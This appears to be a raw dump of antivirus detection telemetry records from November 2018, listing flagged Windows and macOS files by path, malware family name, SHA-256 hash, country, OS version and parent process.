  Row(detection=Row(filename='avscan-20181104-214539-00becad3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214539-00BECAD3', filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:45:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sures.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\L210_WW_WIN_3793_42\\LIB\\0415\\sures.dll', filesize=324000, name='W32/Ramnit.C.#M1.#R1'), hash='684363cde47c2aae3559e899f0184f3b6bbe1fca44a16dbb5e96decd0226a614', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673040, timestamp='2018-11-04T03:13:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000829', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp00000829', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:51:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\PROGRAM FILES (X86)\\COMMON~1\\MICROS~1\\dw\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MSm1A1jJiUKwRV4f.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T23:25:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-004821-62455e0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a107a04c\\AVSCAN-20181105-004514-46BEEC95\\AVSCAN-20181105-004821-62455E0D', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:48:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b837bc21bde5f390a4a52063fb17f58f90525b4b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b837bc21bde5f390a4a52063fb17f58f90525b4b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='3c306592257065f205c13ca6ae165701e8ef7d8407b57dac2f573b5f49587563', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:43:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000082e5', filepath='C:\\Windows\\Temp\\9f74f793-3e0c-4ccc-958d-ede28943eb23\\tmp0000005e\\tmp000082e5', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='33a6f58abd98ae7f068510b8841c302c679d9ac67b12dc27f184dd22f24e129a', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T09:27:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ws73099cc142f48755-5c83e7b1120018de8c0-2450.htm', filepath='\\\\?\\D:\\Autodesk\\AutoCAD Structural Detailing 2012 - English\\Help\\filesMDG\\WS73099cc142f48755-5c83e7b1120018de8c0-2450.htm', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='494a47ebc274316fde017bd52a6c38beec591cd66639f2d728d2bb5ef9bf3237', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:07:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='ccbd83c2ffe72cfb2673e665846df8f52c18b4d9687af61c4f0a6e46df16f1f4', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T17:27:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='c:\\windows\\system32\\searchprotocolhost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='26c6990e060ac6408d69e1cab2b5d912b4e5289b92478028744a7c8e3d927bc5', metadata=Row(cmdline='Global\\\\UsGthrFltPipeMssGthrPipe17_ Global\\\\UsGthrCtrlFltPipeMssGthrPipe17 1 -2147483646 \\"Software\\\\Microsoft\\\\Windows Search\\" \\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\" \\"C:\\\\ProgramData\\\\Microsoft\\\\Search\\\\Data\\\\Temp\\\\usgthrsvc\\" \\"DownLevelDaemon\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T10:45:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210129-6722b1a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210129-6722B1A2', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:01:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:37:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:28:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:54:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:21:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3fafbd95a0d63ca588eb3a76deaa41c632bde63df9db5663a7f66b534e58c369', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T04:47:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:10:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='a002f39270209b3e40d23f9b45d1bc52fa8ece262b2eaa8695df6afd47b96e49', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-22-28-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-04T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T23:52:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:00:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8e36', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8e36', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T07:42:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='biên bản thi đua cả năm.exe', filepath='G:\\\xa0\\NGUYEN Ổ C\\Biên bản thi đua cả năm.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c829f0471fd190f70d78fed3b4c56e3306cae681025cefafefe6036d572695f6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T11:16:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8F0B5617E5FA994482FAF617E7D5495D00674F7D8E92D1CDC31196E287C4E2F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goku ssj.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku SSJ\\Goku SSJ.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='af7c388430851abc1301d292822555af10a55bd51dcb640ef2841d67e170b264', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134615-39e072f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-134555-373BCB84\\AVSCAN-20181102-134615-39E072F2', filesize=372000, name='PUA/SearchProtect.#M1.#R1'), hash='ea8d0c17dc2c9e27511e765a8b16c09da059e04645aa1336304f6a8e61f43ef4', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:35:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nkhsiceu.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\NKHsIcEU.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cavibqui.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\caVIBqui.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rapuntsel schastliva navsegda 2012 kino-bezsms.exe', filepath='C:\\Documents and Settings\\X\\Мои документы\\Загрузки\\rapuntsel schastliva navsegda 2012 kino-bezsms.exe', filesize=600000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='a94dd49899cbfffc72023ac58e7f415a8394ec2f2f5f10db27915631c2c5a7c5', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='E:\\Program Files\\ASUS\\AI Suite II\\MyLogo\\PEUpdater\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='ea4aeccdcfd216a6f5343a6f947c3faeb98fa59b2b66c8cf814f0b2b8c87e0eb', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:39:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bootpart.exe', filepath='C:\\Program Files (x86)\\UltraISO\\drivers\\bootpart.exe', filesize=256000, name='W32/Infector.Gen8.#M300.#R700734'), hash='80d83a515b7dd7a562e476ffe00c24a46f3a8d379cda7d4ca2b6e5dbed3281a2', metadata=Row(cmdline='\\\\\\/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=248320, timestamp='2018-11-02T23:33:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:46:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trz80bb.tmp', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\trz80BB.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tab_transcriber_3.05.rar', filepath='D:\\Téléchargement\\Tab_Transcriber_3\\.tmp\\Tab_Transcriber_3.05.rar', filesize=1248000, name='TR/Injector.SF.#M1.#R1'), hash='ab320e3ff0e09d6602f89099b95204efe28187c3600558ec67f1101d7ca44280', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T06:29:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='00005710.html', filepath='C:\\ProgramData\\Adobe\\Flash CS3\\en\\Configuration\\HelpPanel\\Help\\FlashLiteLearningAS1\\00005710.html', filesize=120000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d0c44d1ffce8faeb560515be65b92aaa63d943f704f7eeff89c61ef63f67e33f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T09:42:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dumpshx.exe', filepath='\\\\ts-xelcea\\share\\Acad\\acad2008\\x64\\program files\\Root\\Express\\dumpshx.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='ffc4ed3966651bba092516c88b6611c1d713f910f69d70b6076669d608182517', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\redstarpoker\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\redstarpoker\\mppoker.exe', parentsize=1214712, timestamp='2018-11-02T20:37:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9dfa90db31fc007507896028e58395805278fd7fc10a4a762d07b00e31541e93', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\9DFA90DB31FC007507896028E58395805278FD7FC10A4A762D07B00E31541E93', filesize=1172000, name='TR/Dropper.Gen.#M300.#R3670'), hash='9dfa90db31fc007507896028e58395805278fd7fc10a4a762d07b00e31541e93', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:04:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tcpp.exe', filepath='\\\\?\\C:\\Program Files\\ARM\\RVCT\\Programs\\3.1\\569\\win_32-pentium\\tcpp.exe', filesize=8192000, name='W32/Ramnit.CD.#M1.#R1'), hash='e33e793188eb4f6528511a687c4341b915394ec6590538d6714516b391818516', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:41:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afcore.dll', filepath='C:\\Program Files\\ArcGIS\\Desktop10.6\\bin\\AfCore.dll', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ArcGIS\\Desktop10.6\\bin\\ArcMap.exe', parentsize=2178616, timestamp='2018-11-02T21:13:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=324608, timestamp='2018-11-02T06:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-034752-45b54eae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-034752-45B54EAE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='fe479ff96b15acdd5389b3a0c1fe30c95b5570c629afd150a3ed2e7bb2e60aca', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:49:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:51:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='support.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\Support.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c33053e0f12a1f17fa9b5ad751cec655e0f9ca9ddcf8f1fa47af20229009396f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='saves.exe', filepath='I:\\ألعاب\\Games 1\\Dd250\\saves\\saves.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='8ddc94310e264adc90b1d1c52917f3d7beb413ad83541e045672a49a64d797a9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='enumdevlib.dll', filepath='C:\\Program Files\\Realtek\\USB Wireless LAN Utility\\EnumDevLib.dll', filesize=320000, name='HEUR/AGEN.1015211.#M1.#R1'), hash='b1a9b2ef000917214c0198958cbd239d1d91b1720ec40df041262a34d302ad74', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:39:20Z'), dt=datetime.date(2018, 11, 2)),
